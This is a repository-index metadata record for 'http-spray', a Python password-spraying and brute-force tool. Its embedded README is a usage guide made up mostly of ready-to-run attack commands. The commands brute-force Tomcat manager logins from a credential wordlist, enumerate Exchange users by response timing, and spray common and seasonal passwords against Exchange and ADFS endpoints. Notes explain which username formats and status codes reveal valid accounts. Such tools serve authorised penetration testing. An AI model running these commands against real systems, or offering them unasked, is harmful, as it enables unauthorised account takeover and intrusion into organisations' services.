{"id":20812751,"url":"https://github.com/dadevel/http-spray","last_synced_at":"2025-03-12T05:13:20.548Z","repository":{"id":246184703,"uuid":"820349255","full_name":"dadevel/http-spray","owner":"dadevel","description":"Password Spraying and Brute Forcing over HTTP(S)","archived":false,"fork":false,"pushed_at":"2025-02-19T23:31:53.000Z","size":30,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-02-20T00:31:06.218Z","etag":null,"topics":["brute-force","http","password-spraying"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/dadevel.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-06-26T09:42:33.000Z","updated_at":"2025-02-19T23:31:47.000Z","dependencies_parsed_at":"2025-01-18T14:54:11.703Z","dependency_job_id":"4c4599ac-2d62-4916-b20d-0093eeab963e","html_url":"https://github.com/dadevel/http-spray","commit_stats":null,"previous_names":["dadevel/http-spray"],"tags_count":3,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dadevel%2Fhttp-spray","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dadevel%2Fhttp-spray/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dadevel%2Fhttp-spray/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dadevel%2Fhttp-spray/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/dadevel","
download_url":"https://codeload.github.com/dadevel/http-spray/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243159180,"owners_count":20245675,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["brute-force","http","password-spraying"],"created_at":"2024-11-17T20:57:55.660Z","updated_at":"2025-03-12T05:13:20.542Z","avatar_url":"https://github.com/dadevel.png","language":"Python","readme":"# http-spray\n\n## Setup\n\nInstall with [pipx](https://github.com/pypa/pipx/).\n\n~~~ bash\npipx install git+https://github.com/dadevel/http-spray.git\n~~~\n\n## Usage\n\nBrute force Tomcat manager.\n\n~~~ bash\ncurl -LO https://github.com/dadevel/wordlists/raw/main/passwords/tomcat-credentials.txt\nhttp-spray -t https://app.corp.com/tomcat/manager/html -m basic -C ./tomcat-credentials.txt | tee -a ./http-spray.json | jq -c 'select(.status_code != 401)'\n~~~\n\nTime-based user enumeration against on-prem Exchange server.\nRequests for valid users take about 0.1s, invalid users take more than 1.5s.\n\n~~~ bash\nhttp-spray -t https://mail.corp.com/rpc/ -m basic -U ./users.txt -p '' | tee -a ./http-spray.json | jq -c 'select(.time \u003c 0.5)'\n~~~\n\n\u003e **Note:**\n\u003e\n\u003e The user enumeration requires basic authentication and seems to work only with the user formats `corp\\jdoe` and `corp.com\\jdoe` where `jdoe` is the *samaccountname*.\n\nSpray common service accounts against on-prem Exchange server.\n\n~~~ bash\nhttp-spray -t https://mail.corp.com/rpc/ -m ntlm -c scanner:scanner -c printer:printer | tee -a 
./http-spray.json | jq -c 'select(.status_code != 401)'\n~~~\n\n\u003e **Note:**\n\u003e\n\u003e The RPC endpoint returns 404 for successful logins.\n\u003e For alternate endpoints see [here](https://github.com/dadevel/wordlists/raw/main/windows/exchange.txt).\n\u003e\n\u003e Furthermore, Exchange accepts the following username formats: `jdoe`, `corp\\jdoe`, `corp.com\\jdoe` and `jdoe@corp.com` where `jdoe` is the *samaccountname*.\n\u003e Depending on the environment the *mail* attribute, e.g. `john.doe@corp.com`, might work for the OWA web login.\n\nSpray weak passwords against ADFS through OAuth2 password grant.\n\n~~~ bash\nhttp-spray -t https://sts.corp.com/adfs/oauth2/token/ -m oauth --client-id 11111111-2222-3333-4444-555555555555 --resource https://app.corp.com/ -U ./users.txt -p 'Summer2023!' -p 'Winter2023!' | tee -a ./http-spray.json | jq -c 'select(.status_code == 200)'\n~~~\n\nSpray weak passwords against ADFS through NTLM authentication.\n\n~~~ bash\nhttp-spray -t https://sts.corp.com/adfs/services/trust/2005/windowstransport -m ntlm -U ./users.txt -p 'Summer2023!' -p 'Winter2023!' | tee -a ./http-spray.json\n~~~\n\n\u003e **Note:**\n\u003e\n\u003e ADFS accepts the following username formats: `corp\\jdoe`, `corp.com\\jdoe` and `jdoe@corp.com` where `jdoe` is the *samaccountname*.\n\u003e Depending on the environment the *mail* attribute, e.g. `john.doe@corp.com`, might work as well.\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdadevel%2Fhttp-spray","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdadevel%2Fhttp-spray","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdadevel%2Fhttp-spray/lists"}